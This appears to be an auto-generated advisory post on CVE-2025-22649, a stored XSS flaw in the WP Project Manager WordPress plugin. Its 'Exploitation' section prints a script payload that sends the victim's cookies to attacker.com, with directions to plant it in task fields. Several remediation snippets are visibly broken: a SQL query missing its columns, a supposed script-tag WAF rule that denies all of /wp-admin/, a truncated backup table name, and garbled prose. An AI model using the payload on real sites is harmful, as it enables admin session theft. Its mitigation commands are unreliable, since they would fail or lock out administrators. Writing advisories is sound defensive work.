How CVE-2025-22649 Works
This stored XSS vulnerability in weDevs WP Project Manager (versions ≤2.6.22) occurs due to improper input sanitization during web page generation. Attackers inject malicious JavaScript payloads into project management fields (e.g., task descriptions, s). When administrators view the compromised content, the script executes in their session, enabling cookie theft, admin account takeover, or backdoor installation. The payload persists in the database, affecting all users who access the infected project.
DailyCVE Form
Platform: WordPress
Version: ≤2.6.22
Vulnerability: Stored XSS
Severity: Medium
Date: 04/10/2025
What Undercode Say:
Exploitation:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Insert above payload in project/task fields.
Detection:
SELECT FROM wp_pm_meta WHERE meta_value LIKE '%<script%';
Mitigation:
1. Update to patched version immediately.
2. Apply WAF rules blocking script tags:
location ~ /wp-admin/ {
deny all;
}
Sanitization Patch Example:
add_filter('pm_task_sanitization', function($content) {
return wp_kses_post($content);
});
Log Analysis Command:
grep -r "eval(" /var/www/html/wp-content/plugins/wedevs-project-manager/
Temporary Workaround:
Disable plugin via WP-CLI:
wp plugin deactivate wedevs-project-manager
CSRF Protection:
Add nonce verification:
if (!wp_verify_nonce($_POST['nonce'], 'pm_task_update')) {
die('Invalid request');
}
Backup Affected Data:
mysqldump -u root -p wp_db wp_pm_ > pm_backup.sql
Browser Protection Header:
Add to `.htaccess`:
Header set X-XSS-Protection "1; mode=block"
Monitoring:
tail -f /var/log/apache2/access.log | grep -E 'POST.wp-admin'
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-22649
Extra Source Hub:
Undercode
